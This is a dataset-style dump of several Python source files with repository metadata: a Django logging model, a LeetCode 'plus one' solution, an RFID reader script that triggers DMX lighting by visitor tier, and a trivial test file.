operate = models.CharField(max_length=100, verbose_name='操作', null=True)
comment = models.CharField(max_length=300, verbose_name='备注', null=True)
time = models.IntegerField(verbose_name='操作时间', null=True)
class Meta:
verbose_name = '用户操作记录'
verbose_name_plural = verbose_name
ordering = ['-id']
| 635 | 5,692 | 249 |
05c6a9828f005d04f294431c158fe961d52847bf | 2,196 | py | Python | src/leetcodepython/math/plus_one_66.py | zhangyu345293721/leetcode | 1aa5bcb984fd250b54dcfe6da4be3c1c67d14162 | [
"MIT"
] | 90 | 2018-12-25T06:01:30.000Z | 2022-01-03T14:01:26.000Z | src/leetcodepython/math/plus_one_66.py | zhangyu345293721/leetcode | 1aa5bcb984fd250b54dcfe6da4be3c1c67d14162 | [
"MIT"
] | 1 | 2020-08-27T09:53:49.000Z | 2020-08-28T08:57:49.000Z | src/leetcodepython/math/plus_one_66.py | zhangyu345293721/leetcode | 1aa5bcb984fd250b54dcfe6da4be3c1c67d14162 | [
"MIT"
] | 27 | 2019-01-02T01:41:32.000Z | 2022-01-03T14:01:30.000Z | # encoding='utf-8'
'''
/**
* This is the solution of No. 66 problem in the LeetCode,
* the website of the problem is as follow:
* https://leetcode-cn.com/problems/plus-one
* <p>
* The description of problem is as follow:
* ==========================================================================================================
* 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
* <p>
* 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
* <p>
* 你可以假设除了整数 0 之外,这个整数不会以零开头。
* <p>
* 示例 1:
* <p>
* 输入: [1,2,3]
* 输出: [1,2,4]
* 解释: 输入数组表示数字 123。
* 示例 2:
* <p>
* 输入: [4,3,2,1]
* 输出: [4,3,2,2]
* 解释: 输入数组表示数字 4321。
* <p>
* 来源:力扣(LeetCode)
* 链接:https://leetcode-cn.com/problems/plus-one
* 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
* ==========================================================================================================
*
* @author zhangyu (zhangyuyu417@gmail.com)
*/
'''
from typing import List
if __name__ == '__main__':
digits = [9, 9]
solution = Solution()
result = solution.plus_one2(digits)
print(result)
assert result == [1, 0, 0]
| 23.869565 | 109 | 0.431694 | # encoding='utf-8'
'''
/**
* This is the solution of No. 66 problem in the LeetCode,
* the website of the problem is as follow:
* https://leetcode-cn.com/problems/plus-one
* <p>
* The description of problem is as follow:
* ==========================================================================================================
* 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
* <p>
* 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
* <p>
* 你可以假设除了整数 0 之外,这个整数不会以零开头。
* <p>
* 示例 1:
* <p>
* 输入: [1,2,3]
* 输出: [1,2,4]
* 解释: 输入数组表示数字 123。
* 示例 2:
* <p>
* 输入: [4,3,2,1]
* 输出: [4,3,2,2]
* 解释: 输入数组表示数字 4321。
* <p>
* 来源:力扣(LeetCode)
* 链接:https://leetcode-cn.com/problems/plus-one
* 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
* ==========================================================================================================
*
* @author zhangyu (zhangyuyu417@gmail.com)
*/
'''
from typing import List
class Solution:
def plus_one(self, digits: List[int]) -> List[int]:
'''
一个数组加1操作
Args:
digits: 数组数字
Returns:
加1后结果
'''
result = []
count = 1
for num in reversed(digits):
if count == 1:
sum = num + 1
if sum > 9:
result.insert(0, 0)
else:
result.insert(0, sum)
count = 0
else:
result.insert(0, num)
if count == 1:
result.insert(0, 1)
return result
def plus_one2(self, digits: List[int]) -> List[int]:
'''
一个数组加1操作
Args:
digits: 数组数字
Returns:
加1后结果
'''
if not digits or len(digits) < 1:
return []
i = len(digits) - 1
while i >= 0:
if digits[i] != 9:
digits[i] += 1
return digits
digits[i] = 0
i -= 1
result = [0] * (len(digits) + 1)
result[0] = 1
return result
if __name__ == '__main__':
digits = [9, 9]
solution = Solution()
result = solution.plus_one2(digits)
print(result)
assert result == [1, 0, 0]
| 0 | 1,169 | 23 |
75076a96adeb4ff6cf378d14e9c94d30efc3d940 | 6,252 | py | Python | LichtpaalReader.py | kaosbeat/datakamp | 7ac90249b34aa4c3604fa4965ab124ab82d64ac3 | [
"MIT"
] | null | null | null | LichtpaalReader.py | kaosbeat/datakamp | 7ac90249b34aa4c3604fa4965ab124ab82d64ac3 | [
"MIT"
] | null | null | null | LichtpaalReader.py | kaosbeat/datakamp | 7ac90249b34aa4c3604fa4965ab124ab82d64ac3 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
#
# RFID Read
#
import os,sys
import json
import time
import rfidiot
from RFIDapi import *
import array
from ola.ClientWrapper import ClientWrapper
import config
barSignal = 0
dmxwrapper = ClientWrapper()
dmxuniverse = 1
readerid = config.settings['readerID']
print readerid
####################### DMX FUNCTIONS ################
# Card reader Functions
def open_reader():
""" Attempts to open the card reader """
try:
card = rfidiot.card
return card
except:
print "Couldn't open reader!"
sys.exit()
return None
def listen(card, interval):
""" Listens for a card to be placed on the reader """
while 1:
if card.select():
#confirmationDMX()
# print readerid
post = logAction(readerid, card.uid, "ACT")
data = getVistorActions(card.uid)
print data
if (data['visitortype'] == 'Basic'):
basicDMX()
elif (data['visitortype'] == 'Premium'):
premiumDMX()
elif (data['visitortype'] == 'Premium VIP'):
premiumVIPDMX()
# elif (data['percentile'] <= 20):
# # INSERT DMX CODE HERE KASPER
# p20DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 40):
# p40DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 60):
# p60DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 80):
# p60DMX(data['visitortype'])
# break
# else:
# p100DMX(data['visitortype'])
# break
def listen_remove(card, interval, card_id):
""" Listens for a card to be placed on the reader """
# Screen.wrapper(datascreen)
while 1:
screensaverstate = 1
if not card.select():
# data = json.dumps({"card_info":
# [{"card_id": card_id}, {"timedate": get_time()}, {"action": "Removed"}]})
# print(data)
break
#print "Waiting: Card Removal"
time.sleep(interval)
return None
##setup stuff
# Open the card reader
card = open_reader()
card_info = card.info('cardselect v0.1m')
# Main loop
try:
while 1:
card_id = listen(card, 0.1)
listen_remove(card, 0.1, card_id)
except KeyboardInterrupt:
print "keyboard interrupt!"
| 26.604255 | 89 | 0.576456 | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
#
# RFID Read
#
import os,sys
import json
import time
import rfidiot
from RFIDapi import *
import array
from ola.ClientWrapper import ClientWrapper
import config
barSignal = 0
dmxwrapper = ClientWrapper()
dmxuniverse = 1
readerid = config.settings['readerID']
print readerid
####################### DMX FUNCTIONS ################
def DmxSent(state):
global dmxwrapper
dmxwrapper.Stop()
def SendDmx(dmxuniverse, dmxdata):
global dmxwrapper
dmxclient = dmxwrapper.Client()
dmxclient.SendDmx(dmxuniverse, dmxdata, DmxSent)
dmxwrapper.Run()
def confirmationDMX():
global dmxuniverse
print ("trying to confirm!")
dmxdata = array.array('B', [61, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def basicDMX():
global dmxuniverse
print ("you basic scum")
dmxdata = array.array('B', [7, 255, 0, 255 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def premiumDMX():
global dmxuniverse
print ("you premium scum")
dmxdata = array.array('B', [13, 0, 0, 50 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def premiumVIPDMX():
global dmxuniverse
print ("you vip scum")
dmxdata = array.array('B', [25, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [25, 0, 0, 180 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [25, 0, 0, 255 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(2)
dmxdata = array.array('B', [255, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(2)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def RedDMX():
global dmxuniverse
dmxdata = array.array('B', [7, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(0.7)
dmxdata = array.array('B', [7, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(0.5)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(0.3)
dmxdata = array.array('B', [7, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(0.1)
dmxdata = array.array('B', [7, 0, 0, 128 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(0.1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def YellowDMX():
global dmxuniverse
dmxdata = array.array('B', [19, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def GreenDMX():
global dmxuniverse
dmxdata = array.array('B', [13, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def p20DMX(vtype):
global dmxuniverse
dmxdata = array.array('B', [7, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def p40DMX(vtype):
global dmxuniverse
dmxdata = array.array('B', [32, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def p60DMX(vtype):
global dmxuniverse
dmxdata = array.array('B', [26, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def p80DMX(vtype):
global dmxuniverse
dmxdata = array.array('B', [14, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(1)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
def p100DMX(vtype):
global dmxuniverse
dmxdata = array.array('B', [200, 0, 0, 128 ,0])
SendDmx(dmxuniverse, dmxdata)
time.sleep(3)
dmxdata = array.array('B', [0, 0, 0, 0 ,0])
SendDmx(dmxuniverse, dmxdata)
# Card reader Functions
def open_reader():
""" Attempts to open the card reader """
try:
card = rfidiot.card
return card
except:
print "Couldn't open reader!"
sys.exit()
return None
def listen(card, interval):
""" Listens for a card to be placed on the reader """
while 1:
if card.select():
#confirmationDMX()
# print readerid
post = logAction(readerid, card.uid, "ACT")
data = getVistorActions(card.uid)
print data
if (data['visitortype'] == 'Basic'):
basicDMX()
elif (data['visitortype'] == 'Premium'):
premiumDMX()
elif (data['visitortype'] == 'Premium VIP'):
premiumVIPDMX()
# elif (data['percentile'] <= 20):
# # INSERT DMX CODE HERE KASPER
# p20DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 40):
# p40DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 60):
# p60DMX(data['visitortype'])
# break
# elif (data['percentile'] <= 80):
# p60DMX(data['visitortype'])
# break
# else:
# p100DMX(data['visitortype'])
# break
def listen_remove(card, interval, card_id):
""" Listens for a card to be placed on the reader """
# Screen.wrapper(datascreen)
while 1:
screensaverstate = 1
if not card.select():
# data = json.dumps({"card_info":
# [{"card_id": card_id}, {"timedate": get_time()}, {"action": "Removed"}]})
# print(data)
break
#print "Waiting: Card Removal"
time.sleep(interval)
return None
##setup stuff
# Open the card reader
card = open_reader()
card_info = card.info('cardselect v0.1m')
# Main loop
try:
while 1:
card_id = listen(card, 0.1)
listen_remove(card, 0.1, card_id)
except KeyboardInterrupt:
print "keyboard interrupt!"
| 3,361 | 0 | 332 |
3f5a2a352aa3a95c4de95b90f2096d9a28696c87 | 85 | py | Python | foo.py | thanhkaist/colab_test | 86d3c03b85ceed26c5ebab6db2aa8d88b2f531be | [
"MIT"
] | 1 | 2020-04-04T14:19:45.000Z | 2020-04-04T14:19:45.000Z | foo.py | thanhkaist/colab_test | 86d3c03b85ceed26c5ebab6db2aa8d88b2f531be | [
"MIT"
] | 1 | 2020-04-14T06:33:35.000Z | 2020-04-14T06:38:36.000Z | foo.py | thanhkaist/colab_test | 86d3c03b85ceed26c5ebab6db2aa8d88b2f531be | [
"MIT"
] | null | null | null | import os
| 7.727273 | 19 | 0.517647 | import os
def foo():
print("foo func")
def bar():
print("bar func")
| 18 | 0 | 48 |